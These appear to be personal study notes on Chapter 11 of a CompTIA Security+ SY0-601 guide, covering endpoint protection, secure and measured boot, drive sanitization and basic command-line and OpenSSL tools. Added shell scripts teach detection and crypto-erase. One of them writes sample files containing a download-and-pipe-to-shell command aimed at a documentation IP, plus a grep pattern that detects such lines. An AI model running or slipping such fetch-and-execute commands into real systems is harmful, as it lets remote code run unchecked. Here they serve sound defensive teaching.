Comptia Security+ 601 Chapter 11 Summary

CompTIA Security+ Study Guide: Exam SY0-601 8th Edition, by Mike Chapple & David Seidl

Chapter 11 summary of my notes.


1. Endpoint Security


Endpoints = the devices at the end of a network connection (desktops, laptops, phones, servers). Endpoint security is about protecting those devices rather than the network between them.


Unified Extensible Firmware Interface (UEFI) firmware (the replacement for BIOS) can leverage two different techniques:



  1. Secure boot ensures that the system boots using only software that the original equipment manufacturer (OEM) trusts: each boot component must carry a signature the firmware accepts before it runs.

  2. Measured boot = helps detect boot-level malware. The boot process measures (hashes) each component, starting with the firmware and ending with the boot-start drivers, and records those measurements so they can later be checked, for example through TPM-based attestation.




TPM chip = hardware root of trust for a system; it holds the cryptographic keys that secure the boot process. TPMs provide three major functions:



  1. Remote attestation = lets a remote party verify the hardware and software configuration of the system, based on the boot measurements the TPM recorded.

  2. Binding = encrypts data with a key protected by the TPM, so the data can only be decrypted by that TPM.

  3. Sealing = encrypts data and additionally requires the TPM to be in a specified state (the same boot measurements) before it will decrypt.


HSMs, hardware security modules, are external devices or plug-in cards used to create, store, and manage digital keys for cryptographic functions and authentication. The private keys never leave the module; callers ask it to sign or decrypt on their behalf.


Here are the most common methods that detect malicious software and applications:



  1. Signature-based detection, which uses a hash or other signature generation method to identify files or components of the malware that have been previously observed.

  2. Heuristic, or behavior-based, detection looks at what actions the software takes and matches them to profiles of unwanted activities, so it can catch samples whose hash has never been seen before.

  3. AI and machine learning systems that leverage large amounts of data to find ways to identify malware that may include heuristic, signature, and other detection capabilities.

  4. Sandboxing is used by some tools and by the antimalware vendors themselves to isolate and run sample malicious code.

  5. Endpoint detection and response, EDR, tools combine monitoring capabilities on endpoint devices (via a client or software agent) with network monitoring and log analysis capabilities to collect, correlate, and analyze events. They look for anomalies and indicators of compromise, IoCs, using automated rules and detection engines, and also support manual investigation.
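
The difference between the first two detection methods above is easy to see on a file system. The script below is an added example, not code from the book: it hashes every file in a directory against a blocklist (signature-based detection) and separately matches a behaviour pattern (heuristic detection). The sample "malware" is a harmless one-line stand-in, the blocklist is computed inline, and the 203.0.113.0/24 address is a documentation range; all of it is constructed for this exercise.

```shell
#!/bin/sh
# Added example (not from the book): signature-based vs. heuristic detection,
# run over a few constructed sample files in a temp directory. The "malware" is
# a harmless one-line stand-in; 203.0.113.0/24 is a documentation address range.

sha256_of() {
    # sha256sum is GNU coreutils; fall back to shasum on macOS/BSD.
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Signature scan: a file is flagged only if its exact hash is in the blocklist.
signature_scan() {          # $1 = directory to scan, $2 = blocklist (one SHA-256 per line)
    for f in "$1"/*; do
        if grep -qx "$(sha256_of "$f")" "$2"; then
            printf 'SIGNATURE %s\n' "$(basename "$f")"
        fi
    done
}

# Heuristic scan: flag files matching a behaviour profile instead of a hash.
# Profile used here (constructed): downloads content and pipes it straight into a shell.
heuristic_scan() {          # $1 = directory to scan
    for f in "$1"/*; do
        if grep -Eq '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh' "$f"; then
            printf 'HEURISTIC %s\n' "$(basename "$f")"
        fi
    done
}

# Build the samples, run both scanners and summarise how many each one caught.
demo() {
    work=$(mktemp -d)
    mkdir "$work/samples"
    # Previously observed sample: its hash goes into the signature database.
    printf 'curl -s http://203.0.113.9/x | sh\n' > "$work/samples/dropper.sh"
    # Repacked variant: a one-byte change defeats the hash signature.
    printf 'curl -s http://203.0.113.9/y | sh\n' > "$work/samples/dropper2.sh"
    # Benign file, should be flagged by neither scanner.
    printf 'echo hello\n' > "$work/samples/hello.sh"
    sha256_of "$work/samples/dropper.sh" > "$work/blocklist.txt"

    sig=$(signature_scan "$work/samples" "$work/blocklist.txt" | wc -l | tr -d ' ')
    heur=$(heuristic_scan "$work/samples" | wc -l | tr -d ' ')
    rm -rf "$work"
    echo "signature=$sig heuristic=$heur"
}

demo   # prints: signature=1 heuristic=2
```

The signature scan catches only the sample it has already seen; the repacked variant slips through, which is exactly why vendors layer heuristic and behavioural checks on top of hash matching. The trade-off runs the other way too: a behaviour profile this broad will also flag legitimate install scripts, so heuristic hits need a sandbox or an analyst to confirm them.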


Data loss prevention, DLP, tools are deployed to endpoints in the form of clients or applications. These tools also commonly have network and server-resident components to ensure that data is managed throughout its lifecycle. Key elements of DLP systems:



  1. Data classification support, so that the organization knows which data should be protected.

  2. Data labeling or tagging functions that support those classification and management practices.

  3. Policy management and enforcement functions used to manage data to the standards set by the organization.

  4. Monitoring and reporting capabilities, to quickly notify administrators or security practitioners about issues or potential problems.


DLP systems can also track user behaviors to identify questionable behavior or common mistakes like assigning overly broad permissions.


A host intrusion prevention system, HIPS, analyzes traffic before services or applications on the host process it. Because a HIPS can actively block traffic, misidentification of legitimate traffic as malicious, misconfiguration, or other issues can cause that traffic to be dropped, potentially causing an outage.


A host intrusion detection system, HIDS, performs similar functions but, like a traditional intrusion detection system (IDS) it cannot take action to block traffic. Instead, a HIDS can only report and alert on issues.


Features that are consistent among many firewall devices that claim the title of next-generation firewalls:



  1. Built-in IPS or IDS functionality, which can analyze traffic for attacks and either take action or alert on it.

  2. Antimalware and antivirus features that let the firewall scan traffic for malicious content.

  3. Geo-IP and geolocation capability to match threats with real-world locations.

  4. Proxying, which allows the device to intercept traffic and analyze it by sitting in the middle of encrypted web traffic.

  5. Web application firewall (WAF) capabilities designed to protect web applications.

  6. Sandboxing, to run suspicious files in isolation before they reach the endpoint.


Hardening = involves changing settings on the system to increase its overall level of security.


The Security+ exam outline lists open ports and services, the registry, disk encryption, the operating system, and patch management, including both third-party updates and auto-update, as parts of a hardening process.


The best option for unneeded services is to disable them entirely. In Windows you can use services.msc (or the Stop-Service and Set-Service PowerShell cmdlets) to do this; on Linux systems running systemd, systemctl disable --now <unit> stops a service and keeps it from starting at boot.


Windows registry = the hierarchical configuration database at the core of how Windows tracks what is going on. The registry is thus an important target for attackers, who can use it to automatically start programs (for example via the Run and RunOnce keys), gather information, or otherwise take malicious action on a target machine.


Naming conventions play a number of roles:  



  1. They can help you identify systems based on purpose, location, or other elements included in the naming convention.

  2. They can be used to make systems more anonymous; examplecorp123 is less meaningful to an attacker than examplesqlserver or examplewebserver.

  3. They make scripting and management easier because you can filter, sort, and take other actions more easily using a standard naming convention.


Standardized IP schemas.


Segmenting systems based on purpose, location, or other factors and ensuring that you are managing the IP address space that your organization uses help you avoid address collisions, avoid running out of addresses in network segments, and identify systems that shouldn't be using a given address.


Full-disk encryption, FDE, encrypts the disk and requires that the bootloader or a hardware device provide a decryption key and software or hardware to decrypt the drive for use.


Self-encrypting drive, SED, = implement encryption capabilities in their hardware and firmware. Systems equipped with a self-encrypting drive require a key to boot from the drive, which may be entered manually or provided by a hardware token or device.


Sanitizing drives or media involves one of two processes: wiping the data or destroying the media.


A degausser exposes magnetic media to a very strong electromagnetic field, scrambling the patterns of bits written to the drive. Degaussing is a relatively quick way to destroy the data on magnetic media (it also leaves a hard drive unusable). SSDs, optical media and drives, and flash drives, however, do not respond to degaussing and require different handling.


For hard drives and other magnetic media, this may be accomplished with a series of writes, typically of 1s or 0s, to every storage location (bit) on the drive. Various tools like Darik's Boot and Nuke (DBAN) will perform multiple passes over an entire disk to attempt to ensure that no data remains.


Data remanence is data that remains recoverable on a disk after it was supposedly deleted or overwritten. It is a significant concern with SSDs and other flash media, whose wear-leveling algorithms spread writes across more physical cells than the listed capacity, so a copy of old data can remain in a block the operating system can no longer address.


Wiping SSDs using a traditional drive wipe utility that writes to all accessible locations will miss sections of the disk where copies of data may remain due to the wear-leveling process.


Better solution = use full-disk encryption for the full life of a drive and then discard (cryptographically erase) the encryption key when the data is ready to be retired. Without the key, the ciphertext left in any unaddressable block is useless. Unless your organization faces advanced threats, this approach is likely to keep the data from being recovered by even reasonably capable malicious actors.
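
The crypto-erase idea is worth seeing end to end. The script below is an added example, not from the book: a small file stands in for the encrypted disk, the data-encryption key (DEK) is generated on the spot, and everything runs offline with only the openssl command-line tool. The record contents are constructed.

```shell
#!/bin/sh
# Added example (not from the book): crypto-erase on a file standing in for a disk.
# Everything is constructed here: the DEK is generated on the spot and the
# "disk" is a small encrypted file, so the whole thing runs offline.

crypto_erase_demo() {
    work=$(mktemp -d)
    secret='customer records: alice, bob, carol'

    # 1. Provision: generate a data-encryption key (DEK) and encrypt the "disk"
    #    under it. Only ciphertext is stored from this point on.
    openssl rand -hex 32 > "$work/dek"
    printf '%s\n' "$secret" |
        openssl enc -aes-256-cbc -pbkdf2 -salt -pass file:"$work/dek" -out "$work/disk.img"

    # 2. In service: whoever holds the DEK reads the data normally.
    if openssl enc -d -aes-256-cbc -pbkdf2 -pass file:"$work/dek" -in "$work/disk.img" 2>/dev/null |
            grep -q "$secret"; then
        before=recovered
    else
        before=failed
    fi

    # 3. Retire: destroy the DEK. Here it is overwritten with random bytes and
    #    removed; on real hardware the key lives in a TPM or the SED controller
    #    and is erased there. The ciphertext on "disk" is left untouched.
    openssl rand -hex 32 > "$work/dek"
    rm -f "$work/dek"

    # 4. Attacker with the drive but no key: a guessed key yields no plaintext.
    #    Output is compared to the original text rather than trusting the exit
    #    status, since CBC padding can occasionally validate under a wrong key.
    openssl rand -hex 32 > "$work/guess"
    if openssl enc -d -aes-256-cbc -pbkdf2 -pass file:"$work/guess" -in "$work/disk.img" 2>/dev/null |
            grep -q "$secret"; then
        after=recovered
    else
        after=unrecoverable
    fi

    rm -rf "$work"
    echo "before=$before after=$after"
}

crypto_erase_demo   # prints: before=recovered after=unrecoverable
```

The point of the demonstration is step 3: nothing is written to the "disk" at retirement time, which is what makes this approach work on flash media where overwriting cannot reach every cell. The approach only holds if encryption was enabled before any sensitive data landed on the drive and the key material itself is not recoverable (for SEDs, that means using the drive's own secure-erase command, not just deleting a password).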


The Security+ exam focuses on six command-line tools:



  1. head is a command that shows you the first part of a file. By default, it will show you the first 10 lines of a file, making it a handy tool to quickly see what a file contains.

  2. tail is very similar to the head command, but it displays the last 10 lines of a file by default. tail is often used to view recent log entries or other data in a file that is changing.

  3. cat, short for concatenate, can be used to output files to standard output (your console) or to join files together. Typing cat example.txt will display the contents of example.txt on your console. Typing cat more.txt >> example.txt appends the contents of more.txt to example.txt; note that a single > (cat more.txt > example.txt) replaces example.txt with the contents of more.txt rather than adding to it.

  4. grep is a search tool that allows you to search for patterns that match provided text or regular expressions. In its most basic form, you can search for a word by typing grep 'word' /file/location, replacing word with the word or text string you want to find,

  5. chmod lets you set permissions on files and directories, using either a symbolic or a numeric (octal) representation of the permissions that you want to set. chmod 777 example.txt grants read, write, and execute to the owner, the group, and everyone else, which is almost never appropriate on a hardened system; prefer the narrowest mode that works, such as chmod 750 example.txt (owner full access, group read and execute, others nothing), or the symbolic form chmod u+x example.txt to change a single bit.

  6. logger is the most obscure of the commands that the Security+ exam includes. The logger command hands whatever input you provide to the system's syslog daemon; on many Linux systems that ends up in /var/log/syslog (on others /var/log/messages or the systemd journal, depending on the logging configuration). logger can also be used to add the output of other commands or the contents of files to the system log by piping them into logger, and logger -t tag labels the entries so they are easy to find later.
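
The six tools are more useful in combination than one at a time. The script below is an added example, not from the book: it writes a constructed auth log (every line is fabricated; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges) and then uses head, tail, grep, cat, chmod and logger on it the way a triage pass would. The only assumption is a POSIX shell with coreutils and awk.

```shell
#!/bin/sh
# Added example (not from the book): the six Security+ command-line tools applied
# to a constructed auth log. All log lines and paths below are fabricated; the
# 203.0.113.0/24 and 198.51.100.0/24 addresses are documentation ranges.

write_sample_log() {        # $1 = path to write
    cat > "$1" <<'EOF'
Mar  3 09:00:01 host sshd[811]: Accepted publickey for alice from 10.0.0.5 port 50122 ssh2
Mar  3 09:00:07 host sshd[812]: Failed password for root from 203.0.113.7 port 40111 ssh2
Mar  3 09:00:09 host sshd[812]: Failed password for root from 203.0.113.7 port 40112 ssh2
Mar  3 09:01:15 host CRON[900]: (root) CMD (run-parts /etc/cron.hourly)
Mar  3 09:02:30 host sshd[913]: Failed password for admin from 198.51.100.3 port 51000 ssh2
Mar  3 09:03:40 host sshd[920]: Accepted password for bob from 10.0.0.8 port 50130 ssh2
EOF
}

# head/tail: earliest and latest timestamps in the log (field 3 of a syslog line).
first_event() { head -n 1 "$1" | awk '{print $3}'; }
last_event()  { tail -n 1 "$1" | awk '{print $3}'; }

# grep: count failed logins, then pull the source address of each and rank them.
count_failed() { grep -c 'Failed password' "$1"; }
top_attacker() {
    grep 'Failed password' "$1" |
        sed -n 's/.* from \([0-9.]*\) port .*/\1/p' |
        sort | uniq -c | sort -rn | head -n 1 | awk '{print $2}'
}

# cat: '>' replaces the target file, '>>' appends to it. Reports the line count
# of the target after each operation.
redirect_demo() {           # $1 = scratch directory
    printf 'one\n' > "$1/a.txt"
    printf 'two\n' > "$1/b.txt"
    cat "$1/b.txt" >  "$1/a.txt"; over=$(wc -l < "$1/a.txt" | tr -d ' ')
    cat "$1/b.txt" >> "$1/a.txt"; app=$(wc -l < "$1/a.txt" | tr -d ' ')
    echo "overwrite=$over append=$app"
}

# chmod: owner read/write, group read, nobody else; report the resulting mode bits.
lock_down() { chmod 640 "$1"; ls -ld "$1" | cut -c2-10; }

# logger: record the review in syslog, when this host has a syslog socket to talk to.
log_review() {
    if command -v logger >/dev/null 2>&1; then
        logger -t authreview "$1" 2>/dev/null || true
    fi
}

demo() {
    work=$(mktemp -d)
    log="$work/auth.log"
    write_sample_log "$log"
    echo "first=$(first_event "$log") last=$(last_event "$log")"
    echo "failed=$(count_failed "$log") top=$(top_attacker "$log")"
    redirect_demo "$work"
    echo "mode=$(lock_down "$log")"
    log_review "auth review: $(count_failed "$log") failed logins"
    rm -rf "$work"
}

demo
```

Two details matter beyond the commands themselves: grep -c counts matching lines, not occurrences, which is what you want for events; and the redirect_demo line is the concrete difference between > and >>, which is easy to get backwards when appending to an evidence file.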


The Security+ exam looks at remote access and two scripting environments that you should be aware of.



  1. Secure Shell, or SSH, is an encrypted protocol used to connect to systems, typically via the command line. SSH is also the name of a client that uses the SSH protocol to create that connection.

  2. A shell is a command-line user interface to an operating system. Windows users will be familiar with the command prompt (cmd.exe), and Linux and macOS users will likely be familiar with Bash or another common shell. Shell scripts, or scripts that can be run using the shell, are a tool frequently employed by users and administrators to carry out tasks.

  3. PowerShell scripts and commands allow management and configuration of Windows systems from the command line. PowerShell can report on the current state of the system, make changes both locally and to remote systems, and has many other features that make it a favorite tool for both attackers and defenders.


The final tool that the Security+ exam focuses on in this section = OpenSSL. OpenSSL isn't a shell, and it isn't a scripting language. It is a cryptographic library and command-line toolkit that implements the TLS protocol (and its predecessor, SSL) and is often used to protect other services; web servers commonly rely on OpenSSL's TLS implementation for HTTPS traffic.


The Security+ exam expects you to know how to use OpenSSL as part of assessing organizational security. For a security analyst, that will most often include looking for places where secure communications are needed but absent, or where OpenSSL is misconfigured.


One of the key elements of the TLS protocol is that it can provide perfect forward secrecy (PFS), which comes from ephemeral Diffie-Hellman key exchange (DHE or ECDHE), not from RSA key exchange. With static RSA key exchange the session secret is encrypted under the server's long-term key, so a later compromise of that key exposes every previously captured session; TLS 1.3 dropped RSA key exchange entirely for this reason.
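
You can check which cipher suites give forward secrecy with nothing more than the local openssl binary. The script below is an added example, not from the book: it runs openssl ciphers -v (which prints one suite per line with a Kx= column for the key exchange) and sorts suites by whether their key exchange is ephemeral. It assumes OpenSSL 1.1.1 or later, where TLS 1.3 suites appear with TLSv1.3 in the second column.

```shell
#!/bin/sh
# Added example (not from the book): sort TLS cipher suites by whether their
# key exchange gives forward secrecy, using only the local openssl binary.
# `openssl ciphers -v` prints one suite per line; column 2 is the protocol and
# column 3 the key exchange (Kx=...). Only ephemeral (EC)DH exchange, and every
# TLS 1.3 suite, yields PFS; static RSA key exchange (Kx=RSA) does not.

# Suites from the given cipher string that provide forward secrecy.
pfs_suites() {              # $1 = OpenSSL cipher string, e.g. ALL or HIGH
    openssl ciphers -v "$1" | awk '$2 == "TLSv1.3" || $3 ~ /^Kx=(ECDH|DH)$/ { print $1 }'
}

# Suites whose key exchange is static RSA: the server's private key unwraps
# every recorded session, so a later key compromise exposes old traffic.
static_rsa_suites() {       # $1 = OpenSSL cipher string
    openssl ciphers -v "$1" | awk '$3 == "Kx=RSA" { print $1 }'
}

# Summary for a cipher string: how many suites fall on each side.
pfs_report() {
    echo "pfs=$(pfs_suites "$1" | wc -l | tr -d ' ') static_rsa=$(static_rsa_suites "$1" | wc -l | tr -d ' ')"
}

pfs_report ALL
# One example of each kind: an ECDHE suite (PFS) and an RSA key-exchange suite (no PFS).
pfs_suites 'ECDHE-RSA-AES128-GCM-SHA256'
static_rsa_suites 'AES128-GCM-SHA256'
```

Against a live server the same question is asked with openssl s_client: openssl s_client -connect host:443 -tls1_2 -cipher kRSA completes a handshake only if the server still accepts RSA key exchange, which is the finding you would report. The kRSA alias is OpenSSL's own name for "suites using RSA key exchange".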


Embedded systems are computer systems that are built into other devices such as industrial machinery, appliances, and cars.


Embedded systems typically use a real-time operating system, RTOS, = an operating system designed to process data as it arrives within guaranteed, predictable time bounds, rather than with the best-effort scheduling of a general-purpose operating system.


The Security+ exam outline focuses on three specific types of systems that it lists as embedded systems.



  1. Raspberry Pi = a single-board computer that includes network connectivity, storage, video output, input, CPU, and memory, and runs a full operating system such as Linux.

  2. Arduinos, unlike the Raspberry Pi, are microcontrollers. They include a low-power CPU with a small amount of memory and storage, and they provide input and output capabilities.

  3. Field-programmable gate array, FPGA, = a type of computer chip that can be programmed to redesign how it works, allowing it to be a customizable chip.


Assessing embedded systems:



  1. Identify the manufacturer or type of embedded system and acquire documentation or other materials about it.

  2. Determine how the embedded system interfaces with the world: does it connect to a network, to other embedded devices, or does it only have a keyboard or other physical interface?

  3. If there is a network connection, identify any services or access to it provided through that network connection, and how you can secure those services or the connection itself.

  4. Learn about how the device is updated, if patches are available, and how and when those patches should be installed.